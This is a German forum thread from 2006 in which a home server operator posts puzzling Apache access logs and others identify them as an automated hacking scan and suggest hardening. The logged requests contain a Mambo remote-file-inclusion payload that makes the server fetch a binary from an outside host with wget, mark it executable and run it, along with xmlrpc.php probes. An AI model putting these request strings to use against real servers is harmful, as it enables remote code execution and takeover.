Sehr eigenartige LogDateien

Begonnen von Micha Linden, 26. Februar 2006, 13:26:53 Uhr

⏪ vorheriges - nächstes ⏩

0 Mitglieder und 1 Gast betrachten dieses Thema.

Drucken
Nach unten Seiten1
Benutzer-Aktionen

Micha Linden

26. Februar 2006, 13:26:53 Uhr Letzte Bearbeitung: 08. März 2006, 18:13:31 Uhr von Micha Linden
Hallo Leute..
Ich betreibe einen eigenen Server.. so, das ist ja nix außergewöhliches..

Jetzt habe ich aber toootaaal kuriose AccessLogs gefunden.. die sehen etwa so aus:

access-log
69.9.174.102 - - [26/Feb/2006:13:08:32 +0100] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://219.84.105.36/cmd.gif?&cmd=cd%20/tmp;wget%20219.84.105.36/supina;chmod%20744%20supina;./supina;echo%20YYY;echo|  HTTP/1.1" 404 286
69.9.174.102 - - [26/Feb/2006:13:08:33 +0100] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://219.84.105.36/cmd.gif?&cmd=cd%20/tmp;wget%20219.84.105.36/supina;chmod%20744%20supina;./supina;echo%20YYY;echo|  HTTP/1.1" 404 285
69.9.174.102 - - [26/Feb/2006:13:08:34 +0100] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://219.84.105.36/cmd.gif?&cmd=cd%20/tmp;wget%20219.84.105.36/supina;chmod%20744%20supina;./supina;echo%20YYY;echo|  HTTP/1.1" 404 292
69.9.174.102 - - [26/Feb/2006:13:08:35 +0100] "GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://219.84.105.36/cmd.gif?&cmd=cd%20/tmp;wget%20219.84.105.36/supina;chmod%20744%20supina;./supina;echo%20YYY;echo|  HTTP/1.1" 404 290
69.9.174.102 - - [26/Feb/2006:13:08:37 +0100] "GET /articles/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://219.84.105.36/cmd.gif?&cmd=cd%20/tmp;wget%20219.84.105.36/supina;chmod%20744%20supina;./supina;echo%20YYY;echo|  HTTP/1.1" 404 301
69.9.174.102 - - [26/Feb/2006:13:08:38 +0100] "GET /cvs/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://219.84.105.36/cmd.gif?&cmd=cd%20/tmp;wget%20219.84.105.36/supina;chmod%20744%20supina;./supina;echo%20YYY;echo|  HTTP/1.1" 404 296
69.9.174.102 - - [26/Feb/2006:13:08:39 +0100] "POST /xmlrpc.php HTTP/1.1" 404 286
69.9.174.102 - - [26/Feb/2006:13:08:40 +0100] "POST /blog/xmlrpc.php HTTP/1.1" 404 291
69.9.174.102 - - [26/Feb/2006:13:08:41 +0100] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 298
69.9.174.102 - - [26/Feb/2006:13:08:43 +0100] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 299
69.9.174.102 - - [26/Feb/2006:13:08:44 +0100] "POST /drupal/xmlrpc.php HTTP/1.1" 404 293
69.9.174.102 - - [26/Feb/2006:13:08:45 +0100] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 299
69.9.174.102 - - [26/Feb/2006:13:08:46 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 296
69.9.174.102 - - [26/Feb/2006:13:08:47 +0100] "POST /xmlrpc.php HTTP/1.1" 404 286
69.9.174.102 - - [26/Feb/2006:13:08:49 +0100] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 293
69.9.174.102 - - [26/Feb/2006:13:08:50 +0100] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 293
So..

diese geforderten Ordner (cvs, mambo, blog, blogs, drupal, phpgroupware,wordpress. etc...) existieren NICHT auf meinem Server..

So, aber kann mir jemand erklären was das auf sich hat?



Mit freundlichen Grüßen

Micha Linden

tyco

26. Februar 2006, 14:22:26 Uhr #1
Sieht mir nach einem Hackerversuch aus. Um welchen Server handelt es sich? Mambo?
Bitte keine Supportanfragen per PM stellen.

Micha Linden

26. Februar 2006, 14:36:16 Uhr #2
Nein.
Apache 2.0.55

Was kann ich denn gegen solche Hackerversuche unternehmen?

der-guru

26. Februar 2006, 14:52:04 Uhr #3
Tach,

Tyco hat mich hier hingelotst.


Deine Log hat wahrscheinlich nur einen Securityscan abgefangen.
Das machen hacker um schwächen in systemen zu finden.

Das erste testet deinen Apache. Was du machen kannst ist deinen apache in
chroot umgebung laufen zu lassen und dafür zu sorgen das alle securitypatches
geladen werden.

Eine firewall bringt da nichts, weil die daten bei einer schwachen apacheversion über
die freigegeben apacheports übertragen werden.


mfg
guru

Micha Linden

26. Februar 2006, 15:00:38 Uhr #4 Letzte Bearbeitung: 26. Februar 2006, 15:17:14 Uhr von Micha Linden
Erm..
chroot Umgebung ??
Was ist das?
#
Ich hab jetzt einiges über croot gelesen..
Aber alles hatt mit Linux zu tun.. ?! Nicht mit Windows

der-guru

26. Februar 2006, 15:19:33 Uhr #5
http://de.wikipedia.org/wiki/Chroot



ähh ... natürlich mit linux - womit denn sonst ?!

Micha Linden

26. Februar 2006, 15:28:18 Uhr #6
Mhhh..
Mein Server läuft aber auf Windows ..

der-guru

26. Februar 2006, 15:33:31 Uhr #7
ihh .. wer macht denn sowas ?!


naja ... auch da kannst du den apache in einer benutzerumgebung laufen lassen die möglichst keine rechte hat die sie nicht unbedingt braucht.
sollte dann jemand zugriff bekommen kannst du zumindest verzögern das derjenige vollzugriff auf alle admin-ebenen bekommt.


mfg

Micha Linden

26. Februar 2006, 15:41:03 Uhr #8 Letzte Bearbeitung: 26. Februar 2006, 19:07:02 Uhr von Micha Linden
Soweit, dass ich sowas einrichten kann, bin ich noch nicht.. sry



Added:
So.. jetzt hab ich ersteinmal alles provisorisch geflickt.. dürfte fürs Erste reichen..   ;)
Benutzer-Aktionen
Drucken
Nach oben Seiten1